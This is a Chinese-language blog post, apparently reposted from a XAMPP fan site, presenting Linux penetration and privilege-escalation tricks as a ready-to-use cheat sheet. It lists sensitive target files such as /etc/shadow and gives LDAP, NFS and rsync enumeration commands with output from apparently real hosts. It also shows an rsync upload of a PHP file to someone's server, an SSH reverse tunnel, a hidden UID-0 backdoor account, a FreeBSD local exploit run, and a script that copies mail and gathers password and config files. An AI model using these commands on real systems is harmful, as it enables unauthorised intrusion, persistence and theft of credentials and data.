最新消息:XAMPP默认安装之后是很不安全的,我们只需要点击左方菜单的 "安全"选项,按照向导操作即可完成安全设置。

Linux 渗透与提权技巧

XAMPP教程 中文小张 1248浏览 0评论

Linux 系统下的一些常见路径:

/etc/passw

/etc/shadow

/etc/fstab

/etc/host.conf

/etc/motd

/etc/ld.so.conf

/var/www/htdocs/index.php

/var/www/conf/httpd.conf

/var/www/htdocs/index.html

/var/httpd/conf/php.ini

/var/httpd/htdocs/index.php

/var/httpd/conf/httpd.conf

/var/httpd/htdocs/index.html

/var/httpd/conf/php.ini

/var/www/index.html

/var/www/index.php

/opt/www/conf/httpd.conf

/opt/www/htdocs/index.php

/opt/www/htdocs/index.html

/usr/local/apache/htdocs/index.html

/usr/local/apache/htdocs/index.php

/usr/local/apache2/htdocs/index.html

/usr/local/apache2/htdocs/index.php

/usr/local/httpd2.2/htdocs/index.php

/usr/local/httpd2.2/htdocs/index.html

/tmp/apache/htdocs/index.html

/tmp/apache/htdocs/index.ph

/etc/httpd/htdocs/index.php

/etc/httpd/conf/httpd.conf

/etc/httpd/htdocs/index.html

/www/php/php.in

/www/php4/php.in

/www/php5/php.in

/www/conf/httpd.conf

/www/htdocs/index.php

/www/htdocs/index.html

/usr/local/httpd/conf/httpd.conf

/aache/apache/conf/httpd.conf

/apache/apache2/conf/httpd.conf

/etc/apache/apache.conf

/etc/apache2/apache.conf

/etc/apache/httpd.conf

/etc/apache2/httpd.conf

/etc/apache2/vhosts.d/00_default_vhost.conf

/etc/apache2/sites-available/default

/etc/phpmyadmin/config.inc.php

/etc/mysql/my.cnf

/etc/httpd/conf.d/php.conf

/etc/httpd/conf.d/httpd.con

/etc/httpd/logs/error_log

/etc/httpd/logs/error.log

/etc/httpd/logs/access_log

 

/etc/httpd/logs/access.log

 

/home/apache/conf/httpd.conf

 

/home/apache2/conf/httpd.conf

 

/var/log/apache/error_log

 

/var/log/apache/error.log

 

/var/log/apache/access_log

 

/var/log/apache/access.log

 

/var/log/apache2/error_log

 

/var/log/apache2/error.log

 

/var/log/apache2/access_log

 

/var/log/apache2/access.log

 

/var/www/logs/error_log

 

/var/www/logs/error.log

 

/var/www/logs/access_log

 

/var/www/logs/access.log

 

/usr/local/apache/logs/error_log

 

/usr/local/apache/logs/error.log

 

/usr/local/apache/logs/access_log

 

/usr/local/apache/logs/access.log

 

/var/log/error_log

 

/var/log/error.log

 

/var/log/access_log

 

/var/log/access.log

 

/usr/local/apache/logs/access_logaccess_log.old

 

/usr/local/apache/logs/error_logerror_log.old

 

/etc/php.ini

 

/bin/php.ini

 

/etc/init.d/httpd

 

/etc/init.d/mysql

 

/etc/httpd/php.ini

 

/usr/lib/php.ini

 

/usr/lib/php/php.ini

 

/usr/local/etc/php.ini

 

/usr/local/lib/php.ini

 

/usr/local/php/lib/php.ini

 

/usr/local/php4/lib/php.ini

 

/usr/local/php4/php.ini

 

/usr/local/php4/lib/php.ini

 

/usr/local/php5/lib/php.ini

 

/usr/local/php5/etc/php.ini

 

/usr/local/php5/php5.ini

 

/usr/local/apache/conf/php.ini

 

/usr/local/apache/conf/httpd.conf

 

/usr/local/apache2/conf/httpd.conf

 

/usr/local/apache2/conf/php.ini

 

/etc/php4.4/fcgi/php.ini

 

/etc/php4/apache/php.ini

 

/etc/php4/apache2/php.ini

 

/etc/php5/apache/php.ini

 

/etc/php5/apache2/php.ini

 

/etc/php/php.ini

 

/etc/php/php4/php.ini

 

/etc/php/apache/php.ini

 

/etc/php/apache2/php.ini

 

/web/conf/php.ini

 

/usr/local/Zend/etc/php.ini

 

/opt/xampp/etc/php.ini

 

/var/local/www/conf/php.ini

 

/var/local/www/conf/httpd.conf

 

/etc/php/cgi/php.ini

 

/etc/php4/cgi/php.ini

 

/etc/php5/cgi/php.ini

 

/php5/php.ini

 

/php4/php.ini

 

/php/php.ini

 

/PHP/php.ini

 

/apache/php/php.ini

 

/xampp/apache/bin/php.ini

 

/xampp/apache/conf/httpd.conf

 

/NetServer/bin/stable/apache/php.ini

 

/home2/bin/stable/apache/php.ini

 

/home/bin/stable/apache/php.ini

 

/var/log/mysql/mysql-bin.log

 

/var/log/mysql.log

 

/var/log/mysqlderror.log

 

/var/log/mysql/mysql.log

 

/var/log/mysql/mysql-slow.log

 

/var/mysql.log

 

/var/lib/mysql/my.cnf

 

/usr/local/mysql/my.cnf

 

/usr/local/mysql/bin/mysql

 

/etc/mysql/my.cnf

 

/etc/my.cnf

 

/usr/local/cpanel/logs

 

/usr/local/cpanel/logs/stats_log

 

/usr/local/cpanel/logs/access_log

 

/usr/local/cpanel/logs/error_log

 

/usr/local/cpanel/logs/license_log

 

/usr/local/cpanel/logs/login_log

 

/usr/local/cpanel/logs/stats_log

 

/usr/local/share/examples/php4/php.ini

 

/usr/local/share/examples/php/php.ini

 

/usr/local/tomcat5527/bin/version.sh

 

/usr/share/tomcat6/bin/startup.sh

 

/usr/tomcat6/bin/startup.sh

ldap 渗透技巧:

 

cat /etc/nsswitch

 

看看密码登录策略我们可以看到使用了file ldap模式

 

less /etc/ldap.conf

 

base ou=People,dc=unix-center,dc=net

 

找到ou,dc,dc设置

 

查找管理员信息

 

匿名方式

 

ldapsearch -x -D “cn=administrator,cn=People,dc=unix-center,dc=net” -b “cn=administrator,cn=People,dc=unix-center,dc=net” -h 192.168.2.2

 

有密码形式

 

ldapsearch -x -W -D “cn=administrator,cn=People,dc=unix-center,dc=net” -b “cn=administrator,cn=People,dc=unix-center,dc=net” -h 192.168.2.2

 

查找10条用户记录

 

ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

 

实战

 

cat /etc/nsswitch

 

看看密码登录策略我们可以看到使用了file ldap模式

 

less /etc/ldap.conf

 

base ou=People,dc=unix-center,dc=net

 

找到ou,dc,dc设置

 

查找管理员信息

 

匿名方式

 

ldapsearch -x -D “cn=administrator,cn=People,dc=unix-center,dc=net” -b “cn=administrator,cn=People,dc=unix-center,dc=net” -h 192.168.2.2

 

有密码形式

 

ldapsearch -x -W -D “cn=administrator,cn=People,dc=unix-center,dc=net” -b “cn=administrator,cn=People,dc=unix-center,dc=net” -h 192.168.2.2

 

查找10条用户记录

 

ldapsearch -h 192.168.2.2 -x -z 10 -p 指定端口

 

渗透实战

 

1、返回所有的属性

 

ldapsearch -h 192.168.7.33 -b “dc=ruc,dc=edu,dc=cn” -s sub “objectclass=*”

 

version: 1

 

dn: dc=ruc,dc=edu,dc=cn

 

dc: ruc

 

objectClass: domain

 

dn: uid=manager,dc=ruc,dc=edu,dc=cn

 

uid: manager

 

objectClass: inetOrgPerson

 

objectClass: organizationalPerson

 

objectClass: person

 

objectClass: top

 

sn: manager

 

cn: manager

 

dn: uid=superadmin,dc=ruc,dc=edu,dc=cn

 

uid: superadmin

 

objectClass: inetOrgPerson

 

objectClass: organizationalPerson

 

objectClass: person

 

objectClass: top

 

sn: superadmin

 

cn: superadmin

 

dn: uid=admin,dc=ruc,dc=edu,dc=cn

 

uid: admin

 

objectClass: inetOrgPerson

 

objectClass: organizationalPerson

 

objectClass: person

 

objectClass: top

 

sn: admin

 

cn: admin

 

dn: uid=dcp_anonymous,dc=ruc,dc=edu,dc=cn

 

uid: dcp_anonymous

 

objectClass: top

 

objectClass: person

 

objectClass: organizationalPerson

 

objectClass: inetOrgPerson

 

sn: dcp_anonymous

 

cn: dcp_anonymous

 

2、查看基类

 

bash-3.00# ldapsearch -h 192.168.7.33 -b “dc=ruc,dc=edu,dc=cn” -s base “objectclass=*” | more version: 1 dn: dc=ruc,dc=edu,dc=cn dc: ruc objectClass: domain

 

3、查找

 

bash-3.00# ldapsearch -h 192.168.7.33 -b “” -s base “objectclass=*”

 

version: 1

 

dn:

 

objectClass: top

 

namingContexts: dc=ruc,dc=edu,dc=cn

 

supportedExtension: 2.16.840.1.113730.3.5.7

 

supportedExtension: 2.16.840.1.113730.3.5.8

 

supportedExtension: 1.3.6.1.4.1.4203.1.11.1

 

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.25

 

supportedExtension: 2.16.840.1.113730.3.5.3

 

supportedExtension: 2.16.840.1.113730.3.5.5

 

supportedExtension: 2.16.840.1.113730.3.5.6

 

supportedExtension: 2.16.840.1.113730.3.5.4

 

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.1

 

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.2

 

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.3

 

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.4

 

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.5

 

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.6

 

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.7

 

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.8

 

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.9

 

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.23

 

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.11

 

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.12

 

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.13

 

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.14

 

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.15

 

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.16

 

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.17

 

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.18

 

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.19

 

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.21

 

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.22

 

supportedExtension: 1.3.6.1.4.1.42.2.27.9.6.24

 

supportedExtension: 1.3.6.1.4.1.1466.20037

 

supportedExtension: 1.3.6.1.4.1.4203.1.11.3

 

supportedControl: 2.16.840.1.113730.3.4.2

 

supportedControl: 2.16.840.1.113730.3.4.3

 

supportedControl: 2.16.840.1.113730.3.4.4

 

supportedControl: 2.16.840.1.113730.3.4.5

 

supportedControl: 1.2.840.113556.1.4.473

 

supportedControl: 2.16.840.1.113730.3.4.9

 

supportedControl: 2.16.840.1.113730.3.4.16

 

supportedControl: 2.16.840.1.113730.3.4.15

 

supportedControl: 2.16.840.1.113730.3.4.17

 

supportedControl: 2.16.840.1.113730.3.4.19

 

supportedControl: 1.3.6.1.4.1.42.2.27.9.5.2

 

supportedControl: 1.3.6.1.4.1.42.2.27.9.5.6

 

supportedControl: 1.3.6.1.4.1.42.2.27.9.5.8

 

supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1

 

supportedControl: 1.3.6.1.4.1.42.2.27.8.5.1

 

supportedControl: 2.16.840.1.113730.3.4.14

 

supportedControl: 1.3.6.1.4.1.1466.29539.12

 

supportedControl: 2.16.840.1.113730.3.4.12

 

supportedControl: 2.16.840.1.113730.3.4.18

 

supportedControl: 2.16.840.1.113730.3.4.13

 

supportedSASLMechanisms: EXTERNAL

 

supportedSASLMechanisms: DIGEST-MD5

 

supportedLDAPVersion: 2

 

supportedLDAPVersion: 3

 

vendorName: Sun Microsystems, Inc.

 

vendorVersion: Sun-Java(tm)-System-Directory/6.2

 

dataversion: 020090516011411

 

netscapemdsuffix: cn=ldap://dc=webA:389

 

supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA

 

supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA

 

supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_256_CBC_SHA

 

supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_256_CBC_SHA

 

supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_256_CBC_SHA

 

supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA

 

supportedSSLCiphers: TLS_RSA_WITH_AES_256_CBC_SHA

 

supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_RC4_128_SHA

 

supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA

 

supportedSSLCiphers: TLS_ECDHE_RSA_WITH_RC4_128_SHA

 

supportedSSLCiphers: TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA

 

supportedSSLCiphers: TLS_DHE_DSS_WITH_RC4_128_SHA

 

supportedSSLCiphers: TLS_DHE_RSA_WITH_AES_128_CBC_SHA

 

supportedSSLCiphers: TLS_DHE_DSS_WITH_AES_128_CBC_SHA

 

supportedSSLCiphers: TLS_ECDH_RSA_WITH_RC4_128_SHA

 

supportedSSLCiphers: TLS_ECDH_RSA_WITH_AES_128_CBC_SHA

 

supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_RC4_128_SHA

 

supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA

 

supportedSSLCiphers: SSL_RSA_WITH_RC4_128_MD5

 

supportedSSLCiphers: SSL_RSA_WITH_RC4_128_SHA

 

supportedSSLCiphers: TLS_RSA_WITH_AES_128_CBC_SHA

 

supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_3DES_EDE_CBC_SHA

 

supportedSSLCiphers: TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA

 

supportedSSLCiphers: SSL_DHE_RSA_WITH_3DES_EDE_CBC_SHA

 

supportedSSLCiphers: SSL_DHE_DSS_WITH_3DES_EDE_CBC_SHA

 

supportedSSLCiphers: TLS_ECDH_RSA_WITH_3DES_EDE_CBC_SHA

 

supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_3DES_EDE_CBC_SHA

 

supportedSSLCiphers: SSL_RSA_FIPS_WITH_3DES_EDE_CBC_SHA

 

supportedSSLCiphers: SSL_RSA_WITH_3DES_EDE_CBC_SHA

 

supportedSSLCiphers: SSL_DHE_RSA_WITH_DES_CBC_SHA

 

supportedSSLCiphers: SSL_DHE_DSS_WITH_DES_CBC_SHA

 

supportedSSLCiphers: SSL_RSA_FIPS_WITH_DES_CBC_SHA

 

supportedSSLCiphers: SSL_RSA_WITH_DES_CBC_SHA

 

supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_RC4_56_SHA

 

supportedSSLCiphers: TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA

 

supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC4_40_MD5

 

supportedSSLCiphers: SSL_RSA_EXPORT_WITH_RC2_CBC_40_MD5

 

supportedSSLCiphers: TLS_ECDHE_ECDSA_WITH_NULL_SHA

 

supportedSSLCiphers: TLS_ECDHE_RSA_WITH_NULL_SHA

 

supportedSSLCiphers: TLS_ECDH_RSA_WITH_NULL_SHA

 

supportedSSLCiphers: TLS_ECDH_ECDSA_WITH_NULL_SHA

 

supportedSSLCiphers: SSL_RSA_WITH_NULL_SHA

 

supportedSSLCiphers: SSL_RSA_WITH_NULL_MD5

 

supportedSSLCiphers: SSL_CK_RC4_128_WITH_MD5

 

supportedSSLCiphers: SSL_CK_RC2_128_CBC_WITH_MD5

 

supportedSSLCiphers: SSL_CK_DES_192_EDE3_CBC_WITH_MD5

 

supportedSSLCiphers: SSL_CK_DES_64_CBC_WITH_MD5

 

supportedSSLCiphers: SSL_CK_RC4_128_EXPORT40_WITH_MD5

 

supportedSSLCiphers: SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5

 

<strong> </strong>

 

NFS 渗透技巧:

 

列举IP

 

showmount -e ip

 

rsync渗透技巧:

 

1、查看rsync服务器上的列表

 

rsync 210.51.X.X::

 

finance

 

img_finance

 

auto

 

img_auto

 

html_cms

 

img_cms

 

ent_cms

 

ent_img

 

ceshi

 

res_img

 

res_img_c2

 

chip

 

chip_c2

 

ent_icms

 

games

 

gamesimg

 

media

 

mediaimg

 

fashion

 

res-fashion

 

res-fo

 

taobao-home

 

res-taobao-home

 

house

 

res-house

 

res-home

 

res-edu

 

res-ent

 

res-labs

 

res-news

 

res-phtv

 

res-media

 

home

 

edu

 

news

 

res-book

 

看相应的下级目录(注意一定要在目录后面添加上/)

 

rsync 210.51.X.X::htdocs_app/

 

rsync 210.51.X.X::auto/

 

rsync 210.51.X.X::edu/

 

2、下载rsync服务器上的配置文件

 

rsync -avz 210.51.X.X::htdocs_app/ /tmp/app/

 

3、向上更新rsync文件(成功上传,不会覆盖)

 

rsync -avz nothack.php 210.51.X.X::htdocs_app/warn/

 

http://app.finance.xxx.com/warn/nothack.txt

 

squid渗透技巧:

 

nc -vv 91ri.org 80

 

GET HTTP://www.sina.com / HTTP/1.0

 

GET HTTP://WWW.sina.com:22 / HTTP/1.0

 

SSH端口转发:

 

ssh -C -f -N -g -R 44:127.0.0.1:22 cnbird@ip

 

joomla渗透小技巧:

 

确定版本

 

index.php?option=com_content&amp;view=article&amp;id=30:what-languages-are-supported-by-joomla-15&amp;catid=32:languages&amp;Itemid=47

 

重新设置密码

 

index.php?option=com_user&amp;view=reset&amp;layout=confirm

 

Linux添加UID为0的root用户:

 

useradd -o -u 0 nothack

 

freebsd本地提权:

 

[argp@julius ~]$ uname -rsi

 

* freebsd 7.3-RELEASE GENERIC

 

* [argp@julius ~]$ sysctl vfs.usermount

 

* vfs.usermount: 1

 

* [argp@julius ~]$ id

 

* uid=1001(argp) gid=1001(argp) groups=1001(argp)

 

* [argp@julius ~]$ gcc -Wall nfs_mount_ex.c -o nfs_mount_ex

 

* [argp@julius ~]$ ./nfs_mount_ex

 

*

 

calling nmount()

 

tar 文件夹打包:

 

tar打包

 

tar -cvf /home/public_html/*.tar /home/public_html/–exclude=排除文件*.gif  排除目录 /xx/xx/*

 

alzip打包(韩国) alzip -a D:\WEB d:\web*.rar

 

关于tar的打包方式,linux不以扩展名来决定文件类型。

 

若压缩的话tar -ztf *.tar.gz   查看压缩包里内容     tar -zxf *.tar.gz 解压

 

那么用这条比较好

 

tar -czf /home/public_html/*.tar.gz /home/public_html/–exclude= 排除文件*.gif   排除目录 /xx/xx/*

 

系统信息收集:

 

for linux:

 

#!/bin/bash

 

echo #######geting sysinfo####

 

echo ######usage: ./getinfo.sh &gt;/tmp/sysinfo.txt

 

echo #######basic infomation##

 

cat /proc/meminfo

 

echo

 

cat /proc/cpuinfo

 

echo

 

rpm -qa 2&gt;/dev/null

 

######stole the mail……######

 

cp -a /var/mail /tmp/getmail 2&gt;/dev/null

 

echo ‘u’r id is’ `id`

 

echo ###atq&amp;crontab#####

 

atq

 

crontab -l

 

echo #####about var#####

 

set

 

echo #####about network###

 

####this is then point in pentest,but i am a new bird,so u need to add some in it

 

cat /etc/hosts

 

hostname

 

ipconfig -a

 

arp -v

 

echo ########user####

 

cat /etc/passwd|grep -i sh

 

echo ######service####

 

chkconfig –list

 

for i in {oracle,mysql,tomcat,samba,apache,ftp}

 

cat /etc/passwd|grep -i $i

 

done

 

locate passwd &gt;/tmp/password 2&gt;/dev/null

 

sleep 5

 

locate password &gt;&gt;/tmp/password 2&gt;/dev/null

 

sleep 5

 

locate conf &gt;/tmp/sysconfig 2&gt;dev/null

 

sleep 5

 

locate config &gt;&gt;/tmp/sysconfig 2&gt;/dev/null

 

sleep 5

 

###maybe can use “tree /”###

 

echo ##packing up#########

 

tar cvf getsysinfo.tar /tmp/getmail /tmp/password /tmp/sysconfig

 

rm -rf /tmp/getmail /tmp/password /tmp/sysconfig

文章来源:xampp中文组官网

转载请注明:XAMPP中文组官网 » Linux 渗透与提权技巧

您必须 登录 才能发表评论!